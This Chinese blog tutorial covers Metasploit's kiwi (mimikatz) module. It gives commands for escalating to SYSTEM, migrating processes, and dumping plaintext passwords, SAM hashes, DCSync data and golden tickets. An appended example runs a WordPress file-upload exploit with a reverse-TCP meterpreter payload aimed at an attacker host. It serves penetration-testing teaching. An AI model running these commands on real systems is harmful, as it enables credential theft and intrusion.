【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用

本文详细介绍了如何在Metasploit框架中使用kiwi模块进行系统权限提升和密码凭据获取。首先,讲解了从administrator用户提权到system权限的方法,包括getsystem命令的使用。接着,讨论了在64位系统中进行进程迁移的必要性,并给出了相关命令。最后,重点阐述了kiwi模块的功能,如creds_all用于列举所有凭据,kiwi_cmd执行mimikatz命令以获取系统敏感信息。整个过程详细展示了渗透测试中的关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、简介:

kiwi模块:
  mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

二、前提:

1. 提权到system权限:

1.1 提到system有两个方法:

  一是当前的权限是administrator用户;
  二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限

1.2 进行提权:

命令:

getuid      #查看当前会话用户身份
getsystem   #自动尝试提权

2. 进程迁移:

  kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。
  所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

1、查看当前系统信息,可以看出目标系统是64位的:
命令:

sysinfo #查看当前系统信息

2、查看进程信息:
命令:

ps  #查看进程


3、把进程迁移到PID为504这个程序中(因为当前用户):
注:因为目标系统是64位的所以需要把meterpreter进程迁移到一个64位程序的进程中。
命令:

migrate [PID]   

三、kiwi模块的使用:

load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用

一些有关密码和凭据的命令:

creds_all:             #列举所有凭据
creds_kerberos:        #列举所有kerberos凭据
creds_msv:             #列举所有msv凭据
creds_ssp:             #列举所有ssp凭据
creds_tspkg:           #列举所有tspkg凭据
creds_wdigest:         #列举所有wdigest凭据
dcsync:                #通过DCSync检索用户帐户信息
dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:  #创建黄金票据
kerberos_ticket_list:  #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use:   #使用kerberos票据
kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:          #dump出lsa的SAM
lsa_dump_secrets:      #dump出lsa的密文
password_change:       #修改密码
wifi_list:             #列出当前用户的wifi配置文件
wifi_list_shared:      #列出共享wifi配置文件/编码

1. creds_all:

该命令可以列举系统中的明文密码:
命令:

creds_all  #列举所有凭据

2. kiwi_cmd:

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令:

kiwi_cmd sekurlsa::logonpasswords


MSF(Metasploit Framework)是一款功能强大的渗透测试工具,其中包含了很多漏洞利用模块。其中,文件上传漏洞是常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件,从而控制目标系统。下面是一个使用MSF的文件上传漏洞利用模块的案例: 1. 首先,使用MSF的search命令查找可用的文件上传漏洞利用模块,命令如下: ``` msf > search upload ``` 2. 找到一个目标系统存在文件上传漏洞的网站,并确定上传文件的路径和可上传的文件类型。 3. 利用MSF的exploit命令选择相应的模块,并设置相关参数,例如: ``` msf > use exploit/multi/http/wp_contact_form_7_file_upload msf exploit(wp_contact_form_7_file_upload) > set RHOSTS 192.168.1.100 msf exploit(wp_contact_form_7_file_upload) > set TARGETURI /contact msf exploit(wp_contact_form_7_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp msf exploit(wp_contact_form_7_file_upload) > set LHOST 192.168.1.200 ``` 其中,RHOSTS为目标系统的IP地址,TARGETURI为上传文件的路径,PAYLOAD为要上传的恶意文件类型,LHOST为攻击者的IP地址。 4. 运行exploit命令,执行漏洞利用,上传恶意文件并获得对目标系统的控制: ``` msf exploit(wp_contact_form_7_file_upload) > exploit ``` 以上就是使用MSF的文件上传漏洞利用模块的一个案例。需要注意的是,在实际漏洞利用中,应该先进行充分的测试和准备,避免对目标系统造成不必要的损失。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值